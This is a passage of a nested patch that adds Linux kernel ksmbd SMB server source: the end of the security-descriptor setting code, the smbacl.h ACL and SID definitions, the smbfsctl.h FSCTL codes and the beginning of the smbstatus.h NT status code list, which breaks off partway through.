++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	struct iattr newattrs;
++
++	fattr.cf_uid = INVALID_UID;
++	fattr.cf_gid = INVALID_GID;
++	fattr.cf_mode = inode->i_mode;
++
++	rc = parse_sec_desc(user_ns, pntsd, ntsd_len, &fattr);
++	if (rc)
++		goto out;
++
++	newattrs.ia_valid = ATTR_CTIME;
++	if (!uid_eq(fattr.cf_uid, INVALID_UID)) {
++		newattrs.ia_valid |= ATTR_UID;
++		newattrs.ia_uid = fattr.cf_uid;
++	}
++	if (!gid_eq(fattr.cf_gid, INVALID_GID)) {
++		newattrs.ia_valid |= ATTR_GID;
++		newattrs.ia_gid = fattr.cf_gid;
++	}
++	newattrs.ia_valid |= ATTR_MODE;
++	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
++
++	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
++	/* Update posix acls */
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
++		rc = set_posix_acl(user_ns, inode,
++				   ACL_TYPE_ACCESS, fattr.cf_acls);
++		if (rc < 0)
++			ksmbd_debug(SMB,
++				    "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++				    rc);
++		if (S_ISDIR(inode->i_mode) && fattr.cf_dacls) {
++			rc = set_posix_acl(user_ns, inode,
++					   ACL_TYPE_DEFAULT, fattr.cf_dacls);
++			if (rc)
++				ksmbd_debug(SMB,
++					    "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++					    rc);
++		}
++	}
++
++	inode_lock(inode);
++	rc = notify_change(user_ns, path->dentry, &newattrs, NULL);
++	inode_unlock(inode);
++	if (rc)
++		goto out;
++
++	/* Check it only calling from SD BUFFER context */
++	if (type_check && !(le16_to_cpu(pntsd->type) & DACL_PRESENT))
++		goto out;
++
++	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
++		/* Update WinACL in xattr */
++		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns,
++				       path->dentry, pntsd, ntsd_len);
++	}
++
++out:
++	posix_acl_release(fattr.cf_acls);
++	posix_acl_release(fattr.cf_dacls);
++	mark_inode_dirty(inode);
++	return rc;
++}
++
++void ksmbd_init_domain(u32 *sub_auth)
++{
++	int i;
++
++	memcpy(&server_conf.domain_sid, &domain, sizeof(struct smb_sid));
++	for (i = 0; i < 3; ++i)
++		server_conf.domain_sid.sub_auth[i + 1] = cpu_to_le32(sub_auth[i]);
++}
+diff --git a/fs/smb/server/smbacl.h b/fs/smb/server/smbacl.h
+new file mode 100644
+index 0000000000000..618f2e0236b31
+--- /dev/null
++++ b/fs/smb/server/smbacl.h
+@@ -0,0 +1,238 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *   Modified by Namjae Jeon (linkinjeon@kernel.org)
++ */
++
++#ifndef _SMBACL_H
++#define _SMBACL_H
++
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/posix_acl.h>
++#include <linux/mnt_idmapping.h>
++
++#include "mgmt/tree_connect.h"
++
++#define NUM_AUTHS (6)	/* number of authority fields */
++#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
++
++/*
++ * ACE types - see MS-DTYP 2.4.4.1
++ */
++enum {
++	ACCESS_ALLOWED,
++	ACCESS_DENIED,
++};
++
++/*
++ * Security ID types
++ */
++enum {
++	SIDOWNER = 1,
++	SIDGROUP,
++	SIDCREATOR_OWNER,
++	SIDCREATOR_GROUP,
++	SIDUNIX_USER,
++	SIDUNIX_GROUP,
++	SIDNFS_USER,
++	SIDNFS_GROUP,
++	SIDNFS_MODE,
++};
++
++/* Revision for ACLs */
++#define SD_REVISION	1
++
++/* Control flags for Security Descriptor */
++#define OWNER_DEFAULTED		0x0001
++#define GROUP_DEFAULTED		0x0002
++#define DACL_PRESENT		0x0004
++#define DACL_DEFAULTED		0x0008
++#define SACL_PRESENT		0x0010
++#define SACL_DEFAULTED		0x0020
++#define DACL_TRUSTED		0x0040
++#define SERVER_SECURITY		0x0080
++#define DACL_AUTO_INHERIT_REQ	0x0100
++#define SACL_AUTO_INHERIT_REQ	0x0200
++#define DACL_AUTO_INHERITED	0x0400
++#define SACL_AUTO_INHERITED	0x0800
++#define DACL_PROTECTED		0x1000
++#define SACL_PROTECTED		0x2000
++#define RM_CONTROL_VALID	0x4000
++#define SELF_RELATIVE		0x8000
++
++/* ACE types - see MS-DTYP 2.4.4.1 */
++#define ACCESS_ALLOWED_ACE_TYPE 0x00
++#define ACCESS_DENIED_ACE_TYPE  0x01
++#define SYSTEM_AUDIT_ACE_TYPE   0x02
++#define SYSTEM_ALARM_ACE_TYPE   0x03
++#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
++#define ACCESS_ALLOWED_OBJECT_ACE_TYPE  0x05
++#define ACCESS_DENIED_OBJECT_ACE_TYPE   0x06
++#define SYSTEM_AUDIT_OBJECT_ACE_TYPE    0x07
++#define SYSTEM_ALARM_OBJECT_ACE_TYPE    0x08
++#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
++#define ACCESS_DENIED_CALLBACK_ACE_TYPE 0x0A
++#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
++#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
++#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE  0x0D
++#define SYSTEM_ALARM_CALLBACK_ACE_TYPE  0x0E /* Reserved */
++#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
++#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
++#define SYSTEM_MANDATORY_LABEL_ACE_TYPE 0x11
++#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
++#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
++
++/* ACE flags */
++#define OBJECT_INHERIT_ACE		0x01
++#define CONTAINER_INHERIT_ACE		0x02
++#define NO_PROPAGATE_INHERIT_ACE	0x04
++#define INHERIT_ONLY_ACE		0x08
++#define INHERITED_ACE			0x10
++#define SUCCESSFUL_ACCESS_ACE_FLAG	0x40
++#define FAILED_ACCESS_ACE_FLAG		0x80
++
++/*
++ * Maximum size of a string representation of a SID:
++ *
++ * The fields are unsigned values in decimal. So:
++ *
++ * u8:  max 3 bytes in decimal
++ * u32: max 10 bytes in decimal
++ *
++ * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
++ *
++ * For authority field, max is when all 6 values are non-zero and it must be
++ * represented in hex. So "-0x" + 12 hex digits.
++ *
++ * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
++ */
++#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
++#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
++
++#define DOMAIN_USER_RID_LE	cpu_to_le32(513)
++
++struct ksmbd_conn;
++
++struct smb_ntsd {
++	__le16 revision; /* revision level */
++	__le16 type;
++	__le32 osidoffset;
++	__le32 gsidoffset;
++	__le32 sacloffset;
++	__le32 dacloffset;
++} __packed;
++
++struct smb_sid {
++	__u8 revision; /* revision level */
++	__u8 num_subauth;
++	__u8 authority[NUM_AUTHS];
++	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
++} __packed;
++
++/* size of a struct cifs_sid, sans sub_auth array */
++#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
++
++struct smb_acl {
++	__le16 revision; /* revision level */
++	__le16 size;
++	__le32 num_aces;
++} __packed;
++
++struct smb_ace {
++	__u8 type;
++	__u8 flags;
++	__le16 size;
++	__le32 access_req;
++	struct smb_sid sid; /* ie UUID of user or group who gets these perms */
++} __packed;
++
++struct smb_fattr {
++	kuid_t	cf_uid;
++	kgid_t	cf_gid;
++	umode_t	cf_mode;
++	__le32 daccess;
++	struct posix_acl *cf_acls;
++	struct posix_acl *cf_dacls;
++};
++
++struct posix_ace_state {
++	u32 allow;
++	u32 deny;
++};
++
++struct posix_user_ace_state {
++	union {
++		kuid_t uid;
++		kgid_t gid;
++	};
++	struct posix_ace_state perms;
++};
++
++struct posix_ace_state_array {
++	int n;
++	struct posix_user_ace_state aces[];
++};
++
++/*
++ * while processing the nfsv4 ace, this maintains the partial permissions
++ * calculated so far:
++ */
++
++struct posix_acl_state {
++	struct posix_ace_state owner;
++	struct posix_ace_state group;
++	struct posix_ace_state other;
++	struct posix_ace_state everyone;
++	struct posix_ace_state mask; /* deny unused in this case */
++	struct posix_ace_state_array *users;
++	struct posix_ace_state_array *groups;
++};
++
++int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   int acl_len, struct smb_fattr *fattr);
++int build_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   struct smb_ntsd *ppntsd, int ppntsd_size, int addition_info,
++		   __u32 *secdesclen, struct smb_fattr *fattr);
++int init_acl_state(struct posix_acl_state *state, int cnt);
++void free_acl_state(struct posix_acl_state *state);
++void posix_state_to_acl(struct posix_acl_state *state,
++			struct posix_acl_entry *pace);
++int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid);
++bool smb_inherit_flags(int flags, bool is_dir);
++int smb_inherit_dacl(struct ksmbd_conn *conn, const struct path *path,
++		     unsigned int uid, unsigned int gid);
++int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
++			__le32 *pdaccess, int uid);
++int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
++		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
++		 bool type_check);
++void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
++void ksmbd_init_domain(u32 *sub_auth);
++
++static inline uid_t posix_acl_uid_translate(struct user_namespace *mnt_userns,
++					    struct posix_acl_entry *pace)
++{
++	vfsuid_t vfsuid;
++
++	/* If this is an idmapped mount, apply the idmapping. */
++	vfsuid = make_vfsuid(mnt_userns, &init_user_ns, pace->e_uid);
++
++	/* Translate the kuid into a userspace id ksmbd would see. */
++	return from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid));
++}
++
++static inline gid_t posix_acl_gid_translate(struct user_namespace *mnt_userns,
++					    struct posix_acl_entry *pace)
++{
++	vfsgid_t vfsgid;
++
++	/* If this is an idmapped mount, apply the idmapping. */
++	vfsgid = make_vfsgid(mnt_userns, &init_user_ns, pace->e_gid);
++
++	/* Translate the kgid into a userspace id ksmbd would see. */
++	return from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid));
++}
++
++#endif /* _SMBACL_H */
+diff --git a/fs/smb/server/smbfsctl.h b/fs/smb/server/smbfsctl.h
+new file mode 100644
+index 0000000000000..b98418aae20cd
+--- /dev/null
++++ b/fs/smb/server/smbfsctl.h
+@@ -0,0 +1,91 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   fs/cifs/smbfsctl.h: SMB, CIFS, SMB2 FSCTL definitions
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++/* IOCTL information */
++/*
++ * List of ioctl/fsctl function codes that are or could be useful in the
++ * future to remote clients like cifs or SMB2 client.  There is probably
++ * a slightly larger set of fsctls that NTFS local filesystem could handle,
++ * including the seven below that we do not have struct definitions for.
++ * Even with protocol definitions for most of these now available, we still
++ * need to do some experimentation to identify which are practical to do
++ * remotely.  Some of the following, such as the encryption/compression ones
++ * could be invoked from tools via a specialized hook into the VFS rather
++ * than via the standard vfs entry points
++ */
++
++#ifndef __KSMBD_SMBFSCTL_H
++#define __KSMBD_SMBFSCTL_H
++
++#define FSCTL_DFS_GET_REFERRALS      0x00060194
++#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
++#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
++#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
++#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
++#define FSCTL_LOCK_VOLUME            0x00090018
++#define FSCTL_UNLOCK_VOLUME          0x0009001C
++#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
++#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
++#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
++#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
++/* Verify the next FSCTL number, we had it as 0x00090090 before */
++#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
++#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
++#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
++#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
++#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
++#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
++#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
++#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
++#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
++#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
++#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
++#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
++#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
++#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
++#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
++#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
++#define FSCTL_SET_ZERO_DATA          0x000980C8 /* BB add struct */
++#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
++#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
++#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
++#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
++#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
++#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
++#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
++#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
++#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
++#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
++#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
++#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF /* BB add struct */
++#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
++#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
++#define FSCTL_SIS_LINK_FILES         0x0009C104
++#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
++#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
++/* strange that the number for this op is not sequential with previous op */
++#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
++#define FSCTL_REQUEST_RESUME_KEY     0x00140078
++#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
++#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
++#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
++#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC
++#define FSCTL_COPYCHUNK              0x001440F2
++#define FSCTL_COPYCHUNK_WRITE        0x001480F2
++
++#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
++#define IO_REPARSE_TAG_HSM           0xC0000004
++#define IO_REPARSE_TAG_SIS           0x80000007
++
++/* WSL reparse tags */
++#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
++#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
++#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
++#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
++#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
++#endif /* __KSMBD_SMBFSCTL_H */
+diff --git a/fs/smb/server/smbstatus.h b/fs/smb/server/smbstatus.h
+new file mode 100644
+index 0000000000000..108a8b6ed24a0
+--- /dev/null
++++ b/fs/smb/server/smbstatus.h
+@@ -0,0 +1,1822 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   fs/cifs/smb2status.h
++ *
++ *   SMB2 Status code (network error) definitions
++ *   Definitions are from MS-ERREF
++ *
++ *   Copyright (c) International Business Machines  Corp., 2009,2011
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++/*
++ *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
++ *  SEV C N <-------Facility--------> <------Error Status Code------>
++ *
++ *  C is set if "customer defined" error, N bit is reserved and MBZ
++ */
++
++#define STATUS_SEVERITY_SUCCESS cpu_to_le32(0x0000)
++#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
++#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
++#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
++
++struct ntstatus {
++	/* Facility is the high 12 bits of the following field */
++	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
++	__le32 Code;
++};
++
++#define STATUS_SUCCESS 0x00000000
++#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
++#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
++#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
++#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
++#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
++#define STATUS_ABANDONED cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
++#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
++#define STATUS_USER_APC cpu_to_le32(0x000000C0)
++#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
++#define STATUS_ALERTED cpu_to_le32(0x00000101)
++#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
++#define STATUS_PENDING cpu_to_le32(0x00000103)
++#define STATUS_REPARSE cpu_to_le32(0x00000104)
++#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
++#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
++#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
++#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
++#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
++#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
++#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
++#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
++#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
++#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
++#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
++#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
++#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
++#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
++#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
++#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
++#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
++#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
++#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
++#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
++#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
++#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
++#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
++#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
++#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
++#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
++#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
++#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
++#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
++#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
++#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
++#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
++#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
++#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
++#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
++#define DBG_CONTINUE cpu_to_le32(0x00010002)
++#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
++#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
++#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
++#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
++#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
++#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
++#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
++#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
++#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
++#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
++#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
++#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
++#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
++#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
++#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
++#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
++#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
++#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
++#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
++#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
++#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
++#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
++#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
++#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
++#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
++#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
++#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
++#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
++#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
++#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
++#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
++#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
++#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
++#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
++#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
++#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
++#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
++#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
++#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
++#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
++#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
++#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
++#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
++#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
++#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
++#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
++#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
++#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
++#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
++#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
++#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
++#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
++#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
++#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
++#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
++#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
++#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
++#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
++#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
++#define DBG_CONTROL_C cpu_to_le32(0x40010005)
++#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
++#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
++#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
++#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
++#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
++#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
++#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
++#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
++#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
++#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
++#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
++#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
++#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
++#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
++#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
++#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
++#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
++#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
++#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED	\
++	cpu_to_le32(0x401E0351)
++#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
++#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
++#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
++#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
++#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
++#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
++#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
++#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
++#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
++#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
++#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
++#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
++#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
++#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
++#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
++#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
++#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
++#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
++#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
